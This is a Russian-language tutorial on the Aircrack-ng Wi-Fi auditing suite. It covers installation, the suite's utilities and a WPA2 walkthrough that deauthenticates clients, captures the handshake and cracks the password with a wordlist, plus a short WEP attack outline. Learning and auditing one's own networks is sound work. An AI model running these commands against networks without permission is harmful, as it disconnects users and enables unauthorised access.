В этой статье разберём, что такое Aircrack-ng, как его установить (и под Windows, и под Linux), какие режимы атак он поддерживает, и почему в 2025 году его всё ещё обожают пентестеры. А ещё покажу рабочие примеры, как захватить хэндшейк и расшифровать пароль. Но только для учебных целей, конечно же!
Что такое Aircrack-ng
Aircrack-ng — это набор инструментов с открытым исходным кодом для аудита Wi-Fi-сетей. Программа позволяет:
- Анализировать трафик в режиме мониторинга
- Перехватывать пакеты и рукопожатия
- Атаковать WEP и WPA/WPA2-PSK
- Подделывать пакеты, усиливая трафик
- Обнаруживать скрытые точки доступа
- Взаимодействовать с GPS и картографией Wi-Fi
Aircrack-ng особенно популярен в Kali Linux, но его можно установить почти в любую Unix-подобную систему, включая macOS. Даже Windows, как ни странно, может — правда, с ограничениями.
Установка Aircrack-ng
Linux (Ubuntu/Debian/Kali)
На Kali установлен по умолчанию. Если нет — команда ниже:
sudo apt update sudo apt install aircrack-ng
Arch Linux
sudo pacman -S aircrack-ng
macOS (через Homebrew)
brew install aircrack-ng
Обратите внимание: для мониторинга и инъекций macOS мало пригоден. Лучше использовать внешнюю Wi-Fi-карту и Linux в виртуалке.
Windows
Есть сборки для Windows, но:
- Не все Wi-Fi карты поддерживают режим мониторинга
- Нужны драйверы с поддержкой NDIS
- Никаких инъекций — только пассивный сбор
Загрузить можно с официального сайта: aircrack-ng.org
Рекомендация: используйте VirtualBox с Kali Linux + USB Wi-Fi адаптер (поддерживающий режим мониторинга и инъекций). Например, Alfa AWUS036NHA — проверенная классика.
Ключевые утилиты внутри Aircrack-ng
- airmon-ng — включает мониторинг
- airodump-ng — перехват пакетов
- aireplay-ng — инъекции (деаутентификация, replay и т.д.)
- aircrack-ng — расшифровка хэшей (WEP/WPA-PSK)
- airbase-ng — фейковая точка доступа
- airdecap-ng — расшифровка захваченного трафика
Все они работают в консоли и дружат друг с другом. Ручное управление — это кайф. Да, порог входа чуть выше, чем в GUI-инструментах, зато вы знаете, что происходит.
Пример: атака на WPA2 с перехватом рукопожатия
Предположим, у вас есть Wi-Fi с WPA2. Цель: захватить рукопожатие (handshake), когда кто-то подключается, и попытаться подобрать пароль.
1. Включаем режим мониторинга
sudo airmon-ng start wlan0
2. Запускаем перехват
sudo airodump-ng wlan0mon
Запоминаем BSSID цели и канал (CH). Пример:
- BSSID: AA:BB:CC:DD:EE:FF
- Канал: 6
3. Фиксируем цель
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
4. Форсируем отключение клиента (деаутентификация)
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
Ждём подключения клиента и захвата handshake. Если повезёт — через несколько секунд он будет в .cap-файле.
5. Взламываем пароль с помощью словаря
aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF capture.cap
Если пароль в словаре — получите его в чистом виде. Если нет — пора искать лучше словарь.
Атака на WEP (да, всё ещё бывает)
WEP считается давно мёртвым, но иногда его всё ещё можно встретить на забытых роутерах. В этом случае Aircrack-ng — король. Принцип прост:
- Перехватываете IV-пакеты с airodump-ng
- Усиливаете поток с aireplay-ng (fake-auth и ARP replay)
- Накопив 10k–100k пакетов, запускаете aircrack-ng
Весь процесс может занять от пары минут до получаса — всё зависит от активности в сети.
Сравнение с другими инструментами
Инструмент | Функции | Минусы |
---|---|---|
Aircrack-ng | Мониторинг, захват, взлом WEP/WPA | CLI, требует знания сетей |
Wifite | Автоматизация на базе Aircrack-ng | Меньше контроля |
Bettercap | MITM + анализ Wi-Fi | Больше про сниффинг, чем взлом |
Практические советы
- Используйте внешние Wi-Fi адаптеры с поддержкой инъекций (чипсет Atheros/Realtek)
- Собирайте только на своём оборудовании — всё остальное незаконно
- Проверяйте свои сети на устойчивость к простым атакам
- Храните словари на SSD — это ускоряет взлом WPA
Выводы
Aircrack-ng — это не игрушка, а настоящая лаборатория по безопасности Wi-Fi. Он требует понимания сетей, но даёт в руки мощнейший инструментарий. Его главные плюсы — гибкость, скорость и отсутствие «магии» за кулисами: всё под контролем, всё видно.
Если вы хотите по-настоящему понять, как работают Wi-Fi атаки — начните с Aircrack-ng. А когда разберётесь — можно автоматизировать процессы через Wifite, интегрировать в Bettercap или писать свои скрипты на Python. Главное — не забывайте, что эти знания налагают ответственность.